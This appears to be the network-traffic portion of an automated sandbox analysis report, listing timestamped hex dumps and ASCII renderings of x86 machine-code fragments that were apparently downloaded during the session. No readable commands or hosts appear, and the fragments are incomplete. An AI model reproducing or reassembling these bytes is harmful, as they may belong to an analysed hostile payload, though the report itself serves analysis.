                  2023-01-13 15:04:35 UTC251INData Raw: 90 83 c7 01 89 fa 39 d6 7c 27 8d 1c 16 89 df c1 ef 1f 01 df d1 ff 39 0c fd 1c 24 4d 00 72 e2 39 0c fd 18 24 4d 00 76 5b 83 c7 ff 89 fe 39 d6 7d d9 8d 91 02 00 fc ff 81 fa 02 11 fc ff 72 46 be 78 00 00 00 31 d2 eb 12 90 90 90 90 90 90 90 90 90 83 c7 01 89 fa 39 d6 7c 2b 8d 1c 16 89 df c1 ef 1f 01 df d1 ff 39 0c fd fc 2e 4d 00 72 e2 39 0c fd f8 2e 4d 00 76 11 83 c7 ff 89 fe 39 d6 7d d9 eb 02 31 c0 5e 5f 5b c3 b8 02 00 00 00 eb f5 cc 53 57 56 8b 4c 24 10 81 f9 a1 00 00 00 73 0b 85 c9 75 13 31 c0 e9 14 01 00 00 81 f9 fd ff 10 00 0f 86 bc 00 00 00 b8 ff ff ff ff 83 f9 20 0f 82 fa 00 00 00 8d 51 81 83 fa 21 0f 82 ee 00 00 00 8d 91 10 fe f1 ff b8 01 00 00 00 81 fa 10 01 f2 ff 0f 82 d7 00 00 00 be 5b 01 00 00 31 d2 eb 09 83 c7 01 89 fa 39 d6 7c 27 8d 1c 16 89 df
                  Data Ascii: 9|'9$Mr9$Mv[9}rFx19|+9.Mr9.Mv9}1^_[SWVL$su1 Q![19|'
                  2023-01-13 15:04:35 UTC259INData Raw: 00 00 8b 84 24 a0 03 00 00 50 68 40 f8 43 00 68 57 34 4e 00 6a 65 68 44 39 4e 00 56 e8 e0 7f 00 00 83 c4 18 6a 54 e8 56 6e 00 00 83 c4 04 89 84 24 9c 03 00 00 8b 84 24 9c 03 00 00 50 68 40 f8 43 00 68 49 5f 4e 00 6a 62 68 d3 af 4e 00 56 e8 ad 7f 00 00 83 c4 18 6a 55 e8 23 6e 00 00 83 c4 04 89 84 24 98 03 00 00 8b 84 24 98 03 00 00 50 68 40 f8 43 00 68 07 ec 4d 00 6a 72 68 3a 22 4e 00 56 e8 7a 7f 00 00 83 c4 18 68 8e 00 00 00 e8 ed 6d 00 00 83 c4 04 89 84 24 94 03 00 00 8b 84 24 94 03 00 00 50 68 40 f8 43 00 68 d9 41 4e 00 6a 6c 68 f1 41 4e 00 56 e8 44 7f 00 00 83 c4 18 68 8f 00 00 00 e8 b7 6d 00 00 83 c4 04 89 84 24 90 03 00 00 8b 84 24 90 03 00 00 50 68 40 f8 43 00 68 70 3a 4e 00 6a 64 68 6e dc 4d 00 56 e8 0e 7f 00 00 83 c4 18 ff 35 7c 77 4c 00 68 c2 de
                  Data Ascii: $Ph@ChW4NjehD9NVjTVn$$Ph@ChI_NjbhNVjU#n$$Ph@ChMjrh:"NVzhm$$Ph@ChANjlhANVDhm$$Ph@Chp:NjdhnMV5|wLh
                  2023-01-13 15:04:35 UTC267INData Raw: f1 4d 00 8b ac 24 4c 05 00 00 55 e8 c1 53 00 00 83 c4 10 89 c6 6a 00 e8 25 4f 00 00 83 c4 04 89 84 24 88 01 00 00 8b 84 24 88 01 00 00 50 68 c0 63 44 00 68 35 e7 4d 00 6a 00 68 7f 03 4e 00 56 e8 bc 5a 00 00 83 c4 18 83 ff ff 0f 84 95 0a 00 00 83 ff 01 0f 84 8c 0a 00 00 e9 d2 01 00 00 68 bb 20 4e 00 68 e0 f0 4d 00 68 45 f1 4d 00 8b ac 24 4c 05 00 00 55 e8 56 53 00 00 83 c4 10 89 c6 6a 19 6a 4b 6a 02 50 e8 e5 55 00 00 83 c4 10 68 ca f0 4d 00 68 85 b5 4e 00 56 e8 82 5f 00 00 83 c4 0c c7 40 0c 00 00 00 00 6a 10 55 e8 40 55 00 00 83 c4 08 89 c7 50 e8 85 4e 00 00 83 c4 04 89 84 24 9c 01 00 00 8b 84 24 9c 01 00 00 50 68 20 62 44 00 68 ca f0 4d 00 6a 72 68 a7 48 4e 00 56 e8 1c 5a 00 00 83 c4 18 89 47 04 c7 40 0c 01 00 00 00 8b 47 04 c6 40 08 01 57 e8 42 4e 00 00
                  Data Ascii: M$LUSj%O$$PhcDh5MjhNVZh NhMhEM$LUVSjjKjPUhMhNV_@jU@UPN$$Ph bDhMjrhHNVZG@G@WBN
                  2023-01-13 15:04:35 UTC274INData Raw: 8b 7f 2c 85 ff 0f 8e 28 01 00 00 8b 4d 38 f7 df 31 d2 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 3b 04 91 0f 84 fb 00 00 00 8d 34 17 83 fe ff 0f 84 ef 00 00 00 83 c2 01 89 fe 01 d6 75 e2 e9 ef 00 00 00 39 7b 0c 0f 85 ea 00 00 00 ff 74 24 24 57 e8 4a e1 fd ff 83 c4 08 85 c0 0f 88 d5 00 00 00 50 8b 74 24 28 56 57 e8 93 e0 fd ff 83 c4 0c 89 c7 8b 43 08 8b 48 2c 83 c1 ff 51 56 50 e8 1d da fd ff 83 c4 0c 3b 3c 24 0f 84 a7 00 00 00 57 6a 02 55 e8 38 29 ff ff 83 c4 0c ff 34 24 e8 4d 91 fe ff 83 c4 04 89 c6 57 e8 42 91 fe ff 83 c4 04 89 c7 85 f6 75 17 68 8b 01 00 00 68 e4 4c 4f 00 68 90 18 4f 00 e8 c8 81 06 00 83 c4 0c 85 ff 75 17 68 8c 01 00 00 68 e4 4c 4f 00 68 8c 16 4f 00 e8 ad 81 06 00 83 c4 0c 6a 01 55 e8 1f 22 ff ff 83 c4 08 3b 46 54 75 0e ff 77 54 6a 01
                  Data Ascii: ,(M81;4u9{t$$WJPt$(VWCH,QVP;<$WjU8)4$MWBuhhLOhOuhhLOhOjU";FTuwTj
                  2023-01-13 15:04:35 UTC282INData Raw: ff ff 31 f6 eb 1b 31 c0 8b 5c 24 1c 50 55 57 e8 dd c3 fd ff 83 c4 0c 55 57 e8 53 c9 fd ff 83 c4 08 56 6a 43 53 e8 67 0a ff ff 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 44 24 20 8b 5c 24 1c 8b 6c 24 18 8b 7c 24 14 83 f8 03 0f 84 aa 00 00 00 85 c0 0f 85 3d 01 00 00 89 d8 8b 5f 14 6a 44 50 e8 5e 03 ff ff 83 c4 08 89 c6 55 57 e8 82 c8 fd ff 83 c4 08 55 57 e8 f8 be fd ff 83 c4 08 f6 c3 01 0f 85 90 00 00 00 f6 c3 02 0f 85 a1 00 00 00 f6 c3 04 0f 85 b2 00 00 00 f6 c3 08 74 11 6a 03 68 0a 86 4e 00 55 57 e8 27 c0 fd ff 83 c4 10 31 c0 f6 c3 01 74 0d b8 01 00 00 00 85 f6 0f 84 ab 00 00 00 f6 c3 02 74 0c 83 fe 01 0f 84 9f 00 00 00 83 c0 01 f6 c3 04 74 0c 83 fe 02 0f 84 8e 00 00 00 83 c0 01 c0 eb 03 83 fe 03 0f 94 c1 31 d2 84
                  Data Ascii: 11\$PUWUWSVjCSg^_[]USWVD$ \$l$|$=_jDP^UWUWtjhNUW'1ttt1
                  2023-01-13 15:04:35 UTC290INData Raw: 14 c7 46 04 00 00 00 00 c7 46 20 00 00 00 00 85 ff 74 0b 57 e8 88 57 ff ff 83 c4 04 eb 02 31 c0 89 46 04 8a 44 24 1c 88 46 24 c7 46 28 05 00 00 00 c6 46 2c 01 c7 46 30 00 00 00 00 c7 46 34 64 00 00 00 c7 46 38 00 00 00 00 c7 46 3c 00 00 00 00 c6 46 40 00 89 f0 5e 5f 5b 5d c3 cc cc cc cc cc 55 53 57 56 8b 7c 24 18 8b 5c 24 14 8b 6c 24 34 6a 00 6a 44 6a 01 e8 f5 ff fe ff 83 c4 0c 89 c6 8d 43 14 6a 00 6a 01 ff 73 10 6a 04 50 ff 73 18 e8 7b 00 ff ff 83 c4 18 89 43 18 8b 4b 10 8d 51 01 89 53 10 89 34 88 c7 06 07 00 00 00 c6 46 08 00 8b 43 0c c1 e0 10 05 00 00 ff ff 89 46 0c 8b 44 24 2c 89 46 1c 8b 44 24 30 89 46 10 89 6e 14 c7 46 04 00 00 00 00 c7 46 20 00 00 00 00 85 ff 74 0b 57 e8 b8 56 ff ff 83 c4 04 eb 02 31 c0 89 46 04 8a 44 24 1c 88 46 24 8b 44 24 20 89
                  Data Ascii: FF tWW1FD$F$F(F,F0F4dF8F<F@^_[]USWV|$\$l$4jjDjCjjsjPs{CKQS4FCFD$,FD$0FnFF tWV1FD$F$D$
                  2023-01-13 15:04:35 UTC298INData Raw: 00 89 d9 ba 01 00 00 00 e8 04 02 00 00 89 06 85 c0 74 35 8d 54 24 1c 8b 4c 24 18 89 f3 81 c3 4c 40 00 00 40 bf 01 00 00 00 0f 44 c7 89 45 f4 8b 02 53 50 ff d1 83 c4 08 89 46 04 8b 08 50 ff 51 18 83 c4 04 85 c0 74 0e 56 e8 73 e1 fe ff 83 c4 04 e9 50 01 00 00 8b 46 04 8b 08 6a 00 50 ff 51 14 83 c4 08 8b 46 08 56 ff 70 08 e8 01 f3 fe ff 83 c4 08 c6 46 10 00 83 7d fc 00 74 40 8b 46 08 6a 00 68 ba 11 4f 00 ff 70 14 68 ab e3 4e 00 e8 4d d4 fe ff 83 c4 10 89 c7 50 e8 f2 62 06 00 83 c4 04 8b 4e 04 8b 11 50 57 51 ff 52 08 83 c4 0c 57 e8 0b e1 fe ff 83 c4 04 c6 46 10 01 c6 46 11 00 c7 86 28 40 00 00 00 00 00 00 c7 46 0c 00 00 00 00 68 d0 04 42 00 e8 f5 f1 fe ff 83 c4 04 89 86 2c 40 00 00 68 b0 61 40 00 e8 e2 f1 fe ff 83 c4 04 89 86 30 40 00 00 68 60 b2 44 00 e8 cf
                  Data Ascii: t5T$L$L@@DESPFPQtVsPFjPQFVpF}t@FjhOphNMPbNPWQRWFF(@FhB,@ha@0@h`D
                  2023-01-13 15:04:35 UTC306INData Raw: 04 12 83 c0 ff 50 56 e8 15 df fe ff 83 c4 08 8b 04 24 85 c0 75 db be 00 01 00 00 03 74 24 04 8b 4c 24 1c 31 e1 e8 a7 0d 05 00 89 f0 83 c4 20 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 5c 24 18 8b 7c 24 14 8b 74 24 10 83 7e 08 00 74 0e 8d 46 0c 6a 2c 50 e8 d0 b9 fe ff 83 c4 08 83 c6 0c 53 57 56 e8 42 b9 fe ff 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 5c 24 14 8b 7c 24 10 53 e8 bf 43 06 00 83 c4 04 89 c6 83 7f 08 00 74 0e 8d 47 0c 6a 2c 50 e8 89 b9 fe ff 83 c4 08 83 c7 0c 56 53 57 e8 fb b8 fe ff 83 c4 0c 5e 5f 5b c3 cc cc cc cc 55 53 57 56 8b 74 24 14 8b 46 04 31 db 85 c0 0f 84 82 00 00 00 8b 3e b9 ff ff ff ff 90 90 90 90 80 3c 1f 2c 75 1c 8d 14 1f 83 c2 01 89 16 8d 14 08 89 56 04 83 c3 01 83 c1 ff 39 d8 75 e2
                  Data Ascii: PV$ut$L$1 ^_[SWV\$|$t$~tFj,PSWVB^_[SWV\$|$SCtGj,PVSW^_[USWVt$F1><,uV9u
                  2023-01-13 15:04:35 UTC313INData Raw: 83 c4 04 c3 31 c0 c3 cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8b 80 7c ff ff ff 8b 08 ff 74 24 18 ff 74 24 18 ff 74 24 18 ff 74 24 18 ff 74 24 18 50 ff 11 83 c4 18 c3 cc cc cc cc cc cc cc cc cc 53 57 56 8b 74 24 10 8b 46 d4 85 c0 74 10 8b 08 50 ff 51 08 83 c4 04 c7 46 d4 00 00 00 00 8b 5c 24 18 8b 7c 24 14 83 7e f8 00 74 19 ff 76 f0 e8 4c 6a 01 00 83 c4 04 c7 46 f0 00 00 00 00 c7 46 f8 00 00 00 00 8b 86 7c ff ff ff 8b 08 53 57 50 ff 51 04 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc 56 8b 4c 24 14 8b 44 24 10 8b 54 24 08 83 7a d4 00 74 1c 8d b2 74 ff ff ff 83 c2 bc 51 50 52 e8 1c fa fe ff 83 c4 0c 89 f1 5e e9 91 f9 ff ff 8b 92 7c ff ff ff 8b 32 51 50 ff 74 24 14 52 ff 56 08 83 c4 10 5e c3 cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 83 78 d4 00 74 01 c3 8b 80 7c
                  Data Ascii: 1D$|t$t$t$t$t$PSWVt$FtPQF\$|$~tvLjFF|SWPQ^_[VL$D$T$zttQPR^|2QPt$RV^D$xt|
                  2023-01-13 15:04:35 UTC321INData Raw: 15 ac 33 50 00 89 c6 89 07 85 c0 0f 85 85 00 00 00 8b 44 24 10 85 c0 74 7d 8b 4c 24 50 c7 44 24 04 02 00 00 00 8d 54 24 1c 89 54 24 08 c7 04 24 00 00 00 00 c7 44 24 20 01 00 00 00 8b 11 89 54 24 1c 8b 49 04 89 4c 24 24 c7 44 24 2c 02 00 00 00 89 44 24 28 6a 00 6a 01 50 e8 12 83 fe ff 83 c4 0c 89 44 24 30 89 e0 6a 00 50 6a 00 53 ff 15 b0 33 50 00 89 c6 89 07 85 c0 75 1a 8b 44 24 54 8b 4c 24 28 89 08 8b 4c 24 30 89 48 04 8b 37 eb 05 be 06 00 00 00 8b 4c 24 34 31 e1 e8 b0 ce 04 00 89 f0 83 c4 38 5e 5f 5b c3 cc cc cc cc cc cc cc 57 56 83 ec 2c 8b 7c 24 3c a1 34 00 50 00 31 e0 89 44 24 28 85 ff 74 6a 8b 44 24 44 8b 4c 24 40 c7 07 00 00 00 00 c7 44 24 08 02 00 00 00 8d 54 24 10 89 54 24 0c c7 44 24 04 00 00 00 00 c7 44 24 14 01 00 00 00 8b 11 89 54 24 10 8b 49
                  Data Ascii: 3PD$t}L$PD$T$T$$D$ T$IL$$D$,D$(jjPD$0jPjS3PuD$TL$(L$0H7L$418^_[WV,|$<4P1D$(tjD$DL$@D$T$T$D$D$T$I
                  2023-01-13 15:04:35 UTC329INData Raw: e8 cf a7 05 00 83 c4 0c 8b 2e 83 7e 64 00 75 55 8b 46 68 8b 08 50 ff 51 18 83 c4 04 89 c7 85 c0 74 27 68 3c 13 4f 00 68 3c 13 4f 00 57 68 e9 04 4e 00 e8 ba 59 fe ff 83 c4 10 50 ff b5 a0 00 00 00 e8 ab 23 fd ff 83 c4 08 57 e8 72 64 fe ff 83 c4 04 8b 46 68 8b 08 50 ff 11 83 c4 04 e8 8f 9d ff ff 89 46 68 56 ff 73 38 e8 c3 8a fe ff 83 c4 08 8d 46 1c 50 e8 77 bb fe ff 83 c4 04 8d 46 30 50 e8 6b bb fe ff 90 90 90 90 90 90 90 90 90 90 90 83 c4 04 8b 46 58 85 c0 74 0e 8b 48 08 89 4e 58 50 e8 1a 64 fe ff eb e8 8b 46 68 85 c0 74 23 8b 0e 8d 56 6c 39 51 10 75 11 c7 41 0c 00 00 00 00 c7 41 10 00 00 00 00 8b 46 68 8b 08 50 ff 11 83 c4 04 56 e8 e8 63 fe ff 83 c4 04 53 68 30 2d 45 00 e8 8a 2a fd ff 83 c4 08 5e 5f 5b 5d c3 cc cc 56 8b 74 24 08 80 7e 31 00 74 02 5e c3 80
                  Data Ascii: .~duUFhPQt'h<Oh<OWhNYP#WrdFhPFhVs8FPwF0PkFXtHNXPdFht#Vl9QuAAFhPVcSh0-E*^_[]Vt$~1t^
                  2023-01-13 15:04:35 UTC337INData Raw: 78 a7 00 74 11 c6 40 a7 00 6a ff ff 70 34 e8 8e 18 fd ff 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 74 24 10 6a 00 ff 76 90 e8 1f 5e fe ff 83 c4 08 85 c0 74 38 8a 4c 24 14 80 f1 01 bf 01 00 00 00 0f b6 d9 90 90 90 90 90 90 90 90 90 8b 40 1c 8b 08 53 50 ff 51 14 83 c4 08 57 ff 76 90 e8 ea 5d fe ff 83 c4 08 83 c7 01 85 c0 75 e0 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 04 8a 44 01 a5 c3 cc cc cc 8a 44 24 0c 8b 4c 24 08 8b 54 24 04 88 44 0a a5 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 c6 40 c0 01 c3 cc cc cc cc cc cc cc 8b 44 24 04 8a 4c 24 08 88 48 a8 c6 40 d9 01 84 c9 74 0b ff 70 34 e8 35 19 fd ff 83 c4 04 c3 cc 8b 44 24 04 8a 40 a8 c3 cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 14 83 7f a0 00 74 56
                  Data Ascii: xt@jp4SWVt$jv^t8L$@SPQWv]u^_[D$L$DD$L$T$DD$@D$L$H@tp45D$@USWV|$tV
                  2023-01-13 15:04:35 UTC345INData Raw: 1b fe ff 83 c4 04 50 ff 73 20 e8 62 e5 fc ff 83 c4 08 8b 43 04 8b 00 6a 46 ff 50 0c 83 c4 04 83 c0 20 50 ff 73 0c e8 66 5a ff ff 83 c4 08 c7 83 a8 fe ff ff 6c 03 00 00 53 e8 b3 70 ff ff 83 c4 04 84 c0 0f 85 81 e5 ff ff 8b 85 60 01 00 00 6a 01 50 50 ff 50 18 83 c4 0c 85 c0 0f 84 69 e5 ff ff 89 c6 8b 00 83 f8 47 74 45 83 f8 0f 0f 85 f4 06 00 00 68 96 70 4e 00 e8 f4 1a fe ff 83 c4 04 50 ff 73 20 e8 e8 e4 fc ff 83 c4 08 68 8c 0e 4f 00 e8 db 1a fe ff 83 c4 04 50 53 e8 f1 67 ff ff 83 c4 08 c6 83 03 ff ff ff 01 e9 f0 f0 ff ff 89 f0 83 c0 18 50 e8 47 22 fe ff 83 c4 04 83 7e 24 00 0f 85 fc 06 00 00 89 d3 89 04 24 68 a9 59 4e 00 e8 9b 1a fe ff 83 c4 04 50 8b 7c 24 54 ff 77 20 e8 8b e4 fc ff 83 c4 08 8b 87 2c ff ff ff c6 00 01 8b 87 2c ff ff ff c6 40 01 01 68 95 25
                  Data Ascii: Ps bCjFP PsfZlSp`jPPPiGtEhpNPs hOPSgPG"~$$hYNP|$Tw ,,@h%
                  2023-01-13 15:04:35 UTC352INData Raw: 83 c4 04 ff 76 0c e8 46 0c ff ff 83 c4 04 ff 76 10 e8 3b 0c ff ff 83 c4 04 ff 76 24 e8 e0 06 fe ff 83 c4 04 ff b6 94 00 00 00 e8 d2 06 fe ff 83 c4 04 ff 76 18 e8 c7 06 fe ff 83 c4 04 ff 76 1c e8 bc 06 fe ff 83 c4 04 8b 86 88 00 00 00 85 c0 74 09 50 e8 99 68 fe ff 83 c4 04 ff b6 b4 00 00 00 e8 9b 06 fe ff 83 c4 04 ff b6 b0 00 00 00 e8 8d 06 fe ff 83 c4 04 8b 86 a0 00 00 00 85 c0 74 09 50 e8 6a 0c fe ff 83 c4 04 8b 86 a4 00 00 00 85 c0 74 09 50 e8 57 0c fe ff 83 c4 04 8b 86 a8 00 00 00 85 c0 74 09 50 e8 44 0c fe ff 83 c4 04 ff b6 80 00 00 00 e8 36 0c fe ff 83 c4 04 8b 86 28 01 00 00 85 c0 74 09 50 e8 93 13 fe ff 83 c4 04 8b 86 60 01 00 00 85 c0 74 09 50 e8 80 13 fe ff 83 c4 04 ff b6 30 01 00 00 e8 12 06 fe ff 83 c4 04 8b 86 34 01 00 00 85 c0 74 09 8b 08 50
                  Data Ascii: vFv;v$vvtPhtPjtPWtPD6(tP`tP04tP
                  2023-01-13 15:04:35 UTC360INData Raw: 00 0f 85 96 fd ff ff e9 64 fd ff ff c7 06 25 07 00 00 e9 f1 13 00 00 8b 86 dc 00 00 00 8b 8e e0 00 00 00 c1 e1 04 8b 44 08 04 8b 78 04 8b 58 08 8b 86 8c 01 00 00 8b 08 50 ff 51 64 83 c4 04 84 c0 74 22 53 e8 e8 a6 00 00 83 c4 04 57 50 68 e4 0a 4f 00 e8 99 dc fd ff 83 c4 0c 50 55 e8 af 29 ff ff 83 c4 08 8b 86 6c 01 00 00 8b 00 6a 32 ff 50 0c 83 c4 04 89 86 f8 00 00 00 83 c0 30 ff b6 90 00 00 00 50 e8 77 e0 fd ff 83 c4 08 8b 46 08 8b 8e f8 00 00 00 8b 00 83 c1 30 ff 70 18 51 e8 5d e0 fd ff 83 c4 08 8b 86 f8 00 00 00 83 c0 30 68 8a d9 4d 00 50 e8 46 e0 fd ff 83 c4 08 8b 86 f8 00 00 00 83 c0 30 6a 01 50 e8 d2 de fd ff 83 c4 08 8b 86 dc 00 00 00 8b 8e e0 00 00 00 c1 e1 04 8b 04 08 8b 96 f8 00 00 00 89 f1 ff 70 08 ff 70 04 ff b6 ec 00 00 00 ff b6 e8 00 00 00 e8
                  Data Ascii: d%DxXPQdt"SWPhOPU)lj2P0PwF0pQ]0hMPF0jPpp
                  2023-01-13 15:04:35 UTC368INData Raw: ff 72 10 e8 39 c5 fd ff 83 c4 04 89 44 24 0c 89 54 24 14 ff 75 10 e8 26 c5 fd ff 83 c4 04 89 c7 89 54 24 04 ff 75 10 e8 15 c5 fd ff 83 c4 04 8d 86 68 01 00 00 50 e8 d6 0a ff ff 83 c4 04 89 86 88 00 00 00 c6 00 01 8b 86 88 00 00 00 c6 40 01 01 89 6c 24 20 ff 75 10 e8 54 c4 fd ff 83 c4 04 89 86 8c 00 00 00 85 c0 89 7c 24 10 0f 84 15 01 00 00 b8 4d 2c 4e 00 b9 cf 16 4e 00 84 db 0f 45 c8 89 4c 24 18 31 ff 89 74 24 08 eb 55 90 90 90 90 8d 48 0c ff 74 24 18 68 bd 08 4f 00 51 89 c6 e8 bc c2 fd ff 89 f0 83 c4 0c 8b 74 24 08 0f b6 5c 24 38 50 e8 e8 cd fd ff 83 c4 04 0f b6 4c 24 03 51 50 ff b6 88 00 00 00 e8 d3 28 fe ff 83 c4 0c 83 c7 01 8b 86 8c 00 00 00 39 c7 0f 83 a7 00 00 00 c6 86 fc 00 00 00 00 8b 5c 24 20 ff 73 10 e8 4c c4 fd ff 83 c4 04 89 c6 89 d5 ff 73 10
                  Data Ascii: r9D$T$u&T$uhP@l$ uT|$M,NNEL$1t$UHt$hOQt$\$8PL$QP(9\$ sLs
                  2023-01-13 15:04:35 UTC376INData Raw: 04 00 00 00 00 55 57 e8 b5 54 fd ff 83 c4 08 84 c0 0f 84 bc 0a 00 00 c7 44 24 04 00 00 00 00 eb 28 55 e8 7a 22 00 00 83 c4 04 89 f5 6a 00 56 e8 9d ad fd ff 83 c4 08 56 57 e8 83 54 fd ff 83 c4 08 84 c0 0f 84 8a 0a 00 00 89 ee ff 75 00 e8 3e 58 fd ff 83 c4 04 85 c0 74 d0 89 c5 83 78 04 00 74 bf ff 74 24 14 ff 74 24 20 ff 75 08 e8 ff 23 00 00 83 c4 0c 84 c0 74 a8 55 ff 74 24 54 e8 6e ba fd ff 83 c4 08 b0 01 89 44 24 04 eb 9c 8b 74 24 48 85 f6 75 17 68 41 03 00 00 68 36 59 4f 00 68 fa 15 4f 00 e8 aa eb 04 00 83 c4 0c 8b 56 60 8b 04 24 8d 88 84 02 00 00 e8 d3 1e 00 00 89 70 08 c6 40 10 00 80 7c 24 26 00 74 1a 8b 04 24 8d 88 84 02 00 00 ba 4d 34 4e 00 e8 b2 1e 00 00 c7 40 08 00 00 00 00 83 7c 24 08 00 0f 8e de 00 00 00 8b 04 24 8d b8 90 02 00 00 31 c9 31 d2 eb
                  Data Ascii: UWTD$(Uz"jVVWTu>Xtxtt$t$ u#tUt$TnD$t$HuhAh6YOhOV`$p@|$&t$M4N@|$$11
                  2023-01-13 15:04:35 UTC384INData Raw: 39 e9 0f 42 d8 8b 86 28 01 00 00 83 e0 05 83 f8 01 75 1a 39 e9 0f 42 e9 6b c5 c4 03 86 38 01 00 00 8d 8b f0 d8 ff ff 83 f8 0a 0f 42 d9 56 68 e0 07 46 00 53 e8 08 52 fc ff 83 c4 0c 89 86 10 01 00 00 31 c9 89 c8 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 53 57 56 50 89 d6 89 cf 52 e8 71 0b 05 00 83 c4 04 89 04 24 83 7f 04 00 74 2d 31 ed 31 db 90 8b 07 ff 34 24 56 ff 74 28 04 ff 34 28 e8 3e 8b fd ff 83 c4 10 84 c0 75 43 83 c3 01 8b 47 04 83 c5 14 39 c3 72 da eb 02 31 c0 8d 4f 08 6a 00 6a 01 50 6a 14 51 ff 37 e8 64 89 fd ff 83 c4 18 89 07 8b 4f 04 8d 51 01 89 57 04 8d 0c 89 8d 2c 88 89 34 88 8b 14 24 89 54 88 04 eb 02 03 2f 89 e8 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 80 be 0c 01 00 00 00 0f 85 9f 00 00 00 8b 7c 24 10 39 be 10 01 00 00 0f
                  Data Ascii: 9B(u9Bk8BVhFSR1^_[]USWVPRq$t-114$Vt(4(>uCG9r1OjjPjQ7dOQW,4$T/^_[]WVt$|$9
                  2023-01-13 15:04:35 UTC392INData Raw: 89 84 24 00 01 00 00 e8 e5 6f fd ff 89 44 24 14 89 44 24 28 8b 4e 10 31 ff 31 db be b5 53 4e 00 90 51 e8 2a 66 fd ff 83 c4 04 3c 0a 0f 84 78 03 00 00 3c 0d 0f 84 70 03 00 00 8b 8c 24 18 01 00 00 8b 49 10 83 79 0c 00 0f 85 5c 03 00 00 3c 3a 74 15 83 fb 27 0f 84 4f 03 00 00 88 84 1c d8 00 00 00 83 c3 01 eb ba 51 e8 e4 65 fd ff 83 c4 04 3c 20 0f 85 32 03 00 00 c6 84 1c d8 00 00 00 00 8d b4 24 d8 00 00 00 6a 16 68 10 c6 4e 00 56 e8 da c6 03 00 83 c4 0c 31 ff 85 c0 74 4e 6a 16 68 59 c8 4e 00 56 e8 c4 c6 03 00 83 c4 0c 85 c0 74 53 6a 16 68 09 cd 4e 00 56 e8 b0 c6 03 00 83 c4 0c 85 c0 74 5a 6a 14 68 91 e3 4e 00 56 e8 9c c6 03 00 83 c4 0c 85 c0 b8 17 e0 4d 00 be f5 da 4d 00 0f 44 f0 31 ff e9 bf 02 00 00 c7 44 24 04 03 00 00 00 c7 44 24 10 00 81 4d 00 b0 01 89 04
                  Data Ascii: $oD$D$(N11SNQ*f<x<p$Iy\<:t'OQe< 2$jhNV1tNjhYNVtSjhNVtZjhNVMMD1D$D$M
                  2023-01-13 15:04:35 UTC399INData Raw: 02 85 f6 74 0b 56 e8 46 cd 04 00 83 c4 04 eb 02 31 c0 89 74 24 08 83 cd 03 01 dd 01 c5 6a 00 6a 01 55 e8 ca 4a fd ff 83 c4 0c 89 c6 53 e8 bf 0a 00 00 83 c4 04 57 50 68 0f 07 4f 00 56 e8 3f ca f9 ff 83 c4 10 89 c5 89 74 24 04 01 f5 83 7c 24 38 00 7e 37 31 db 8b 3c 24 90 90 90 90 90 90 90 90 8b 74 24 38 29 de 83 fe 03 b8 03 00 00 00 0f 4d f0 8d 04 1f 55 56 50 e8 84 3b 00 00 83 c4 0c 01 f3 83 c5 04 3b 5c 24 38 7c d6 8b 44 24 08 85 c0 74 13 c6 45 00 20 83 c5 01 50 55 e8 60 c6 04 00 83 c4 08 eb 04 c6 45 00 00 8b 4c 24 20 31 e1 e8 1c 96 03 00 8b 44 24 04 83 c4 24 5e 5f 5b 5d c3 55 53 57 56 83 ec 50 8b 74 24 68 8b 7c 24 64 a1 34 00 50 00 31 e0 89 44 24 4c e8 d1 4f fd ff 89 c5 89 7c 24 04 89 7c 24 18 89 74 24 20 c7 44 24 1c 00 00 00 00 c7 44 24 24 00 00 00 00 8d
                  Data Ascii: tVF1t$jjUJSWPhOV?t$|$8~71<$t$8)MUVP;;\$8|D$tE PU`EL$ 1D$$^_[]USWVPt$h|$d4P1D$LO|$|$t$ D$D$$
                  2023-01-13 15:04:35 UTC407INData Raw: e8 0c ae 04 00 83 c4 04 89 f1 89 f2 83 f8 2f 0f 85 94 02 00 00 68 e0 bb 4e 00 57 e8 31 b0 04 00 83 c4 08 80 3c 07 00 89 f1 89 f2 0f 85 78 02 00 00 0f be 07 89 f1 89 f2 83 f8 3a 0f 84 68 02 00 00 80 7f 01 3a 89 f1 89 f2 0f 84 5a 02 00 00 80 7f 03 3a 89 f1 89 f2 0f 84 4c 02 00 00 80 7f 04 3a 89 f1 89 f2 0f 84 3e 02 00 00 80 7f 06 3a 89 f1 89 f2 0f 84 30 02 00 00 80 7f 07 3a 89 f1 89 f2 0f 84 22 02 00 00 80 7f 09 3a 89 f1 89 f2 0f 84 14 02 00 00 80 7f 0a 3a 89 f1 89 f2 0f 84 06 02 00 00 80 7f 0c 3a 89 f1 89 f2 0f 84 f8 01 00 00 80 7f 0d 3a 89 f1 89 f2 0f 84 ea 01 00 00 80 7f 0f 3a 89 f1 89 f2 0f 84 dc 01 00 00 80 7f 10 3a 89 f1 89 f2 0f 84 ce 01 00 00 80 7f 12 3a 89 f1 89 f2 0f 84 c0 01 00 00 80 7f 13 3a 89 f1 89 f2 0f 84 b2 01 00 00 80 7f 15 3a 89 f1 89 f2
                  Data Ascii: /hNW1<x:h:Z:L:>:0:":::::::::
